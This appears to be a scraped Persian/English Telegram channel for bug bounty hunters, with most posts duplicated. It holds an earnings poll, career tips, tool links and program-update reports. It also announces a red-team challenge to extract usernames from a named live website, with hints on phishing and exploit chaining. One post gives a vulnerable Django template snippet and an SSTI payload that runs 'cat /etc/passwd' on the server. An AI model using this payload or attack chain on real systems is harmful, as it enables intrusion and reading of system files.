«تا الان تو باگبانتی چقدر درآمد داشتی؟»
public poll
$0 – هنوز شروع نکردم یا در حال یادگیری ام و یا اولین vdp ام رو زدم – 29
👍👍👍👍👍👍👍 64%
$1 – $500 – 7
👍👍 16%
$5,000+ – 7
👍👍 16%
$500 – $5,000 – 2
▫️ 4%
👥 45 people voted so far.
public poll
$0 – هنوز شروع نکردم یا در حال یادگیری ام و یا اولین vdp ام رو زدم – 29
👍👍👍👍👍👍👍 64%
$1 – $500 – 7
👍👍 16%
$5,000+ – 7
👍👍 16%
$500 – $5,000 – 2
▫️ 4%
👥 45 people voted so far.
❤2🔥1
Reza Mohamadzade via @vote
«تا الان تو باگبانتی چقدر درآمد داشتی؟» public poll $0 – هنوز شروع نکردم یا در حال یادگیری ام و یا اولین vdp ام رو زدم – 29 👍👍👍👍👍👍👍 64% $1 – $500 – 7 👍👍 16% $5,000+ – 7 👍👍 16% $500 – $5,000 – 2 ▫️ 4% 👥 45 people voted so far.
مزایای باگ بانتی نسبت به سایر شاخههای امنیتی :
1. شروع راحت تر و بدون نیاز به مدرک رسمی
برخلاف برخی شاخه های امنیتی مانند پنتست یا رد تیمینگ که گاهی به مدرک یا تجربه رسمی نیاز دارند، باگبانتی دروازهای باز و آسان تر است. فقط کافی است مهارت های هک و امنیت و گزارش نویسی را یاد بگیری.
2. آزادی زمانی و مکانی بیشتر
در حالی که پنتسترها یا رد تیمها معمولا پروژههای زمان بندی شده و محل کار مشخص دارند، باگ هانترها هر وقت و هرجا که بخواهند میتوانند کار کنند.
3. درآمد مستقیم و بدون واسطه
در باگ بانتی به ازای هر آسیب پذیری پول مستقیم دریافت میکنی، بدون اینکه مانند کارمندی حقوق ثابت داشته باشی. یعنی هر چقدر بیشتر تلاش کنی، درآمدت بیشتر میشود.
4. یادگیری و تجربه واقعی تر
در باگ بانتی روی سیستم های واقعی و بزرگ کار میکنی، برخلاف محیط های آزمایشی یا شبیه سازی شده که گاهی در پنتست یا رد تیمینگ استفاده میشوند.
5. امکان کار روی پروژه های متنوع و جهانی
می توانی روی هزاران پروژه مختلف از شرکت های بزرگ دنیا کار کنی، بدون اینکه محدود به یک سازمان یا تیم باشی.
6. امکان ایجاد نام و برند شخصی در جامعه امنیتی
با گزارش دادن باگ های مهم، میتوانی شناخته شوی و حتی فرصتهای کاری بهتر و پروژههای بزرگتر به دست آوری.
حالا BugBounty آره یا نه ؟!
#BugBounty #RedTeam #Pentest
⭐️ @Zerosec_team
1. شروع راحت تر و بدون نیاز به مدرک رسمی
برخلاف برخی شاخه های امنیتی مانند پنتست یا رد تیمینگ که گاهی به مدرک یا تجربه رسمی نیاز دارند، باگبانتی دروازهای باز و آسان تر است. فقط کافی است مهارت های هک و امنیت و گزارش نویسی را یاد بگیری.
2. آزادی زمانی و مکانی بیشتر
در حالی که پنتسترها یا رد تیمها معمولا پروژههای زمان بندی شده و محل کار مشخص دارند، باگ هانترها هر وقت و هرجا که بخواهند میتوانند کار کنند.
3. درآمد مستقیم و بدون واسطه
در باگ بانتی به ازای هر آسیب پذیری پول مستقیم دریافت میکنی، بدون اینکه مانند کارمندی حقوق ثابت داشته باشی. یعنی هر چقدر بیشتر تلاش کنی، درآمدت بیشتر میشود.
4. یادگیری و تجربه واقعی تر
در باگ بانتی روی سیستم های واقعی و بزرگ کار میکنی، برخلاف محیط های آزمایشی یا شبیه سازی شده که گاهی در پنتست یا رد تیمینگ استفاده میشوند.
5. امکان کار روی پروژه های متنوع و جهانی
می توانی روی هزاران پروژه مختلف از شرکت های بزرگ دنیا کار کنی، بدون اینکه محدود به یک سازمان یا تیم باشی.
6. امکان ایجاد نام و برند شخصی در جامعه امنیتی
با گزارش دادن باگ های مهم، میتوانی شناخته شوی و حتی فرصتهای کاری بهتر و پروژههای بزرگتر به دست آوری.
حالا BugBounty آره یا نه ؟!
#BugBounty #RedTeam #Pentest
⭐️ @Zerosec_team
👍7👎2
A simple web app for parse _buildManifest.js file of NextJS web applications
https://sharokhataie.github.io/build-manifest-parser/
https://github.com/SharokhAtaie/build-manifest-parser
⭐️ @Zerosec_team
https://sharokhataie.github.io/build-manifest-parser/
https://github.com/SharokhAtaie/build-manifest-parser
⭐️ @Zerosec_team
❤4🙏1🤡1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 0 new item
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤3
Sin0x001
من اونو به خودم تبدیل کردم ولی چون برگزیده قدرت زیادی داره باعث ایجاد یک باگ زنجیره ای شد
نه داداش میدونی آخه ایران درست میشه😐
🤣3😁1
📊 Watcher Summary Report
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 6 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 0 new item
🔹 HACKERONE: 6 new items
🔹 INTIGRITI: 0 new item
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
❤2
🔥 ZeroTrace – چالش Red Team (مرحله ۱) 🔥
🎯 هدف: نفوذ، شناسایی، استخراج
📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید.
⏳ مهلت: ۷ روز
🌐 لینک چالش: https://nexovir.ir
📢 جزئیات مأموریت: @zerosec_team
📤 ارسال نتایج: @zeroxdeadbee , @Securecon
ZeroTrace – Red Team Challenge (Level 1)
Objective: Infiltrate. Identify. Extract.
Mission Brief: Your task is to perform an initial access operation targeting the admin panel of the target website. For this proof of concept, you are required to extract the full list of usernames
Target: https://nexovir.ir
Time Limit: 7 days
Submit Results To: @zeroxdeadbee or @Securecon
#ZeroSec #Challenge #RedTeam #BugBounty #Hack #Pentest
⭐️ @Zerosec_team
🎯 هدف: نفوذ، شناسایی، استخراج
📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید.
⏳ مهلت: ۷ روز
🌐 لینک چالش: https://nexovir.ir
📢 جزئیات مأموریت: @zerosec_team
📤 ارسال نتایج: @zeroxdeadbee , @Securecon
ZeroTrace – Red Team Challenge (Level 1)
Objective: Infiltrate. Identify. Extract.
Mission Brief: Your task is to perform an initial access operation targeting the admin panel of the target website. For this proof of concept, you are required to extract the full list of usernames
Target: https://nexovir.ir
Time Limit: 7 days
Submit Results To: @zeroxdeadbee or @Securecon
#ZeroSec #Challenge #RedTeam #BugBounty #Hack #Pentest
⭐️ @Zerosec_team
🔥4❤2👨💻1😇1
Reza Mohamadzade
🔥 ZeroTrace – چالش Red Team (مرحله ۱) 🔥 🎯 هدف: نفوذ، شناسایی، استخراج 📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید. ⏳ مهلت: ۷ روز 🌐 لینک چالش: https://nexovir.ir…
سلام دوستان عزیزم،
برای حل این چالش لزومی ندارد صرفاً از یک فرایند خطی استفاده کنید. راههای مختلفی برای رسیدن به پاسخ وجود دارد و من تلاش کردهام برای همه دوستان با هر سطح مهارت، سرنخهایی قرار بدهم. هیچ محدودیتی در انتخاب روش وجود ندارد، پس سعی کنید با رویکردی واقعی و خلاقانه اقدام کنید.
Hello my friends,
You don’t need to follow a fixed step-by-step process to solve this challenge. There are many ways to do it, and I’ve shared hints for everyone at different skill levels. You can use any method you like, so try to approach it in a real and creative way.
برای حل این چالش لزومی ندارد صرفاً از یک فرایند خطی استفاده کنید. راههای مختلفی برای رسیدن به پاسخ وجود دارد و من تلاش کردهام برای همه دوستان با هر سطح مهارت، سرنخهایی قرار بدهم. هیچ محدودیتی در انتخاب روش وجود ندارد، پس سعی کنید با رویکردی واقعی و خلاقانه اقدام کنید.
Hello my friends,
You don’t need to follow a fixed step-by-step process to solve this challenge. There are many ways to do it, and I’ve shared hints for everyone at different skill levels. You can use any method you like, so try to approach it in a real and creative way.
❤5
Reza Mohamadzade
🔥 ZeroTrace – چالش Red Team (مرحله ۱) 🔥 🎯 هدف: نفوذ، شناسایی، استخراج 📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید. ⏳ مهلت: ۷ روز 🌐 لینک چالش: https://nexovir.ir…
شما میتونید از روش های پابلیک شده که در ادامه هست استفاده کنید هیچ محدودیتی درکار نخواهد بود :
You can use any of the publicly known methods listed below; there are no limitations on your approach.
Phishing (email phishing, malicious links, spear phishing)
Exploiting Public-Facing Applications (RCE, SQL Injection, LFI/RFI, API vulnerabilities)
Exploiting Services and Misconfigurations (SSH, RDP, SMB, VPN, credential leaks, default credentials)
Chaining Multiple Exploits (combining XSS and session hijacking, combining credential leaks and VPN access)
You can use any of the publicly known methods listed below; there are no limitations on your approach.
Phishing (email phishing, malicious links, spear phishing)
Exploiting Public-Facing Applications (RCE, SQL Injection, LFI/RFI, API vulnerabilities)
Exploiting Services and Misconfigurations (SSH, RDP, SMB, VPN, credential leaks, default credentials)
Chaining Multiple Exploits (combining XSS and session hijacking, combining credential leaks and VPN access)
👍3❤2
این دوست عماراتی تقریبا سرنخ خودش رو پیدا کرده و داره راه درستی رو میره امیدوارم بتونه آسیب پذیری رو اکسپلویت کنه و همچنین امیدوارم شما هم با متد خودتون راه نفوذ رو پیدا کنید✌️
⭐️ @Zerosec_team
⭐️ @Zerosec_team
❤4🔥1
🚨 Important Tip: RCE in Django via Unsafe Template Rendering
In Django, if user input is passed directly to a Template and rendered, it can lead to Remote Code Execution (RCE). This is a Server-Side Template Injection (SSTI) vulnerability.
💻 Vulnerable Example:
⚠️ In this code, user input is passed to the template without filtering, which can allow system command execution.
💥 Payload:
This payload:
Accesses the str class.
Uses mro and __subclasses__() to reach subprocess.Popen.
Executes a system command (cat /etc/passwd) and returns the output.
________________________________________________
🚨 نکته مهم : RCE در Django با Unsafe Template Rendering
در Django، اگر ورودی کاربر مستقیم به Template داده شود و رندر شود ممکن است منجر به RCE شود. این یک آسیب پذیری Server-Side Template Injection (SSTI) است.
💻 مثال آسیب پذیر:
⚠️ در این کد ورودی کاربر بدون فیلتر به Template داده میشود و میتواند باعث اجرای دستورات سیستم شود.
💥 Payload :
این Payload:
کلاس str رو میگیره.
از mro و __subclasses__() استفاده میکنه تا به subprocess.Popen دسترسی پیدا کنه.
دستور سیستم (cat /etc/passwd) رو اجرا میکنه و خروجی رو برمیگردونه.
#Django #RCE #SSTI #Hackers #BugBounty
⭐️ @Zerosec_team
In Django, if user input is passed directly to a Template and rendered, it can lead to Remote Code Execution (RCE). This is a Server-Side Template Injection (SSTI) vulnerability.
💻 Vulnerable Example:
from django.template import Template, Context
from django.http import HttpResponse
user_input = request.GET.get("name", "")
t = Template(user_input)
return HttpResponse(t.render(Context({})))
⚠️ In this code, user input is passed to the template without filtering, which can allow system command execution.
💥 Payload:
{{ ''.__class__.__mro__[2].__subclasses__()[40]('cat /etc/passwd', shell=True).read() }}This payload:
Accesses the str class.
Uses mro and __subclasses__() to reach subprocess.Popen.
Executes a system command (cat /etc/passwd) and returns the output.
________________________________________________
🚨 نکته مهم : RCE در Django با Unsafe Template Rendering
در Django، اگر ورودی کاربر مستقیم به Template داده شود و رندر شود ممکن است منجر به RCE شود. این یک آسیب پذیری Server-Side Template Injection (SSTI) است.
💻 مثال آسیب پذیر:
from django.template import Template, Context
from django.http import HttpResponse
user_input = request.GET.get("name", "")
t = Template(user_input)
return HttpResponse(t.render(Context({})))
⚠️ در این کد ورودی کاربر بدون فیلتر به Template داده میشود و میتواند باعث اجرای دستورات سیستم شود.
💥 Payload :
{{ ''.__class__.__mro__[2].__subclasses__()[40]('cat /etc/passwd', shell=True).read() }}این Payload:
کلاس str رو میگیره.
از mro و __subclasses__() استفاده میکنه تا به subprocess.Popen دسترسی پیدا کنه.
دستور سیستم (cat /etc/passwd) رو اجرا میکنه و خروجی رو برمیگردونه.
#Django #RCE #SSTI #Hackers #BugBounty
⭐️ @Zerosec_team
❤4👌2🔥1🍾1
Reza Mohamadzade
🔥 ZeroTrace – چالش Red Team (مرحله ۱) 🔥 🎯 هدف: نفوذ، شناسایی، استخراج 📌 ماموریت: این یک عملیات initial access برای دسترسی به پنل ادمین است. برای ارائه POC، باید لیست کامل یوزرنیمهای وب سایت هدف را استخراج کنید. ⏳ مهلت: ۷ روز 🌐 لینک چالش: https://nexovir.ir…
hint-0 :
XSS -> Email-Admin -> Phishing -> Exploite
this hint is for those who want to exploit a web vulnerability
❤4
📊 Watcher Summary Report
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 13 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔹 BUGCROWD: 1 new item
🔹 HACKERONE: 13 new items
🔹 INTIGRITI: 10 new items
🔹 YESWEHACK: 0 new item
🔹 FEDERACY: 0 new item
🔗 Details: Click here
#zerosec #bugbounty #watcher #summary_report
⭐️ @ZeroSec_team
🔥4